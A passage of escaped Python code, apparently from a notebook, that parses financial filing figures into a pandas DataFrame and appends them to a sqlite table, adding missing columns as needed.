fig[\"name\"].split(\":\")[-1]\n # if name_checker[key_name] > 2:\n # key_name = key_name + \":\" + tr_name\n key_name = key_name + \":\" + tr_name\n # TODO: Multiply by scale and check if value should be negative\n value = float(fig.text.replace(',', '').replace('-', \"0\"))\n out_dict.setdefault(key_name.lower().strip(), []).append(value)\n\n # # Removing additional entries, only including current and previous year figures\n # for key in out_dict:\n # out_dict[key] = out_dict[key][:2]\n\n # Creating a temporary DataFrame\n out_dict_keys = list(out_dict.keys())\n for key in out_dict_keys:\n if len(out_dict[key]) > 2:\n del out_dict[key]\n\n out_pd = pd.DataFrame.from_dict(out_dict, orient='index')\n out_pd = out_pd.transpose()\n out_pd[\"chn\"] = chn\n try:\n if out_pd[\"chn\"].count() > 1:\n se = pd.Series([\"%s/%s/%s\" % (day, month, year), \"%s/%s/%s\" % (day, month, str(int(year)-1))])\n out_pd[\"date\"] = se.values\n else:\n out_pd[\"date\"] = \"%s/%s/%s\" % (day, month, year)\n except:\n out_pd.to_csv(\"out_pd.csv\")\n\n # Adding any previously missing column into the sqlite database\n if db.dialect.has_table(db, \"fin\"):\n for col in out_pd:\n print(db.execute(\"SELECT * FROM fin LIMIT 1\").keys())\n if col not in db.execute(\"SELECT * FROM fin LIMIT 1\").keys():\n new_col = sqlalchemy.Column(col, sqlalchemy.FLOAT)\n add_column(db, \"fin\", new_col)\n\n # Appending data from DataFrame into sqlite database\n out_pd.to_sql(\"fin\", con=db, if_exists='append', index=False)\n del out_pd\n\n # # Moving file into the complete dir\n # shutil.move(input_dir + filename, complete_dir)\n\nprintProgressBar(1, 1)\n" } ]
3